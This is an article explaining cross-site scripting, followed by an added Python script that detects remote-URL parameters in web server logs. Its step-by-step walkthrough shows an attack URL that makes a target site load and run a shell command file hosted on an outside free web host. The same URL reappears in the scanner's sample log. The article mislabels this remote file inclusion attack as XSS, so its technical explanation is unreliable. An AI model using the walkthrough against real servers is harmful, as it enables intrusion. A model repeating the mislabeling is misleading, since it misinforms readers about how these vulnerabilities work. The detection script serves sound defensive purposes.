Cross site scripting attacks: CSS or XSS
Cross Site Scripting (CSS for short, but sometimes abbreviated as XSS) is one of the most common application-level attacks that hackers use to sneak into web applications today. Cross site scripting is an attack on the privacy of the clients of a particular web site, and it can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties (the attacker and the web site, or the attacker and the victim client), the XSS attack involves three parties: the attacker, a client and the web site. The goal of the XSS attack is to steal the client's cookies, or any other sensitive information that can identify the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site; specifically, the attacker can impersonate the user.
Here is a practical example demonstrating how such an attack can be executed:
Say you set your browser to fully trust your bank's site and allow it to run scripts in your browser. On the other hand, you deny that privilege from the rest of the sites you visit.
If the bank's site is vulnerable to XSS, when you click on a malformed URL that was presented to you at hacker.com, you will be redirected to your bank's site (to which you previously granted scripting rights) and the malicious script written by someone at hacker.com will run. XSS in that manner is an easy way to run scripts on cautious clients that allow only very specific sites to send them scripts.
These attacks can be so powerful that an attacker can even gain access to the shell of a restricted web server.
STEP 1
Create a free web account with any free web hosting service provider.
STEP 2
At any location in your web account, place a text file with some shell command written in it and save it as shell.txt. In our example we have used uptime; however, an attacker may use any such command.
STEP 3
From his web browser, the attacker launches the attack using this URL:
http://www.targetsite.com/index.php?page=http://www.anyfreewebhost.com/youraccount/shell.txt&?&cmd=uptime
STEP 4
If the web server is not properly patched, the attacker may get a valid response such as:
14:30:29 up 4:27, 4 users, load average: 1.64, 1.05, 0.93
Thus the attacker has successfully gained the shell using a simple XSS exploit. From here on it is quite simple for the attacker to install malicious code on the client's system that traps any information that might be useful to him.
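From the defender's side, the request in STEP 3 has a recognizable shape in the web server's access log: a query parameter (here `page`) whose value is a URL on another host. The following is an added example, not part of the original article; the log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format); addresses and times are samples.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:14:30:29 +0000] "GET /index.php?page=http://www.anyfreewebhost.com/youraccount/shell.txt&?&cmd=uptime HTTP/1.1" 200 512
198.51.100.4 - - [12/Mar/2024:14:31:02 +0000] "GET /index.php?page=contact HTTP/1.1" 200 2048
198.51.100.9 - - [12/Mar/2024:14:31:40 +0000] "GET /index.php?page=hTTp%3A%2F%2Fexample.net%2Fa.txt HTTP/1.1" 200 498
198.51.100.4 - - [12/Mar/2024:14:32:10 +0000] "GET /search.php?q=what+is+http HTTP/1.1" 200 1024
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that starts with a URL scheme or a protocol-relative "//host".
REMOTE_VALUE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)


def remote_url_params(request_target):
    """Return [(name, value)] for query parameters whose decoded value is a remote URL."""
    query = urlsplit(request_target).query
    hits = []
    # parse_qsl percent-decodes, so encoded forms such as http%3A%2F%2F are caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_VALUE_RE.match(value):
            hits.append((name, value))
    return hits


def scan(log_text):
    """Yield (client_ip, parameter, remote_host) for each suspicious request."""
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line this parser understands
        client, target = m.groups()
        for name, value in remote_url_params(target):
            yield client, name, urlsplit(value.strip()).hostname


if __name__ == "__main__":
    for client, name, host in scan(SAMPLE_LOG):
        print(f"{client}: parameter '{name}' references remote host {host}")
```

A hit is a lead for review rather than proof of compromise, since some applications legitimately accept URLs in parameters such as redirect targets.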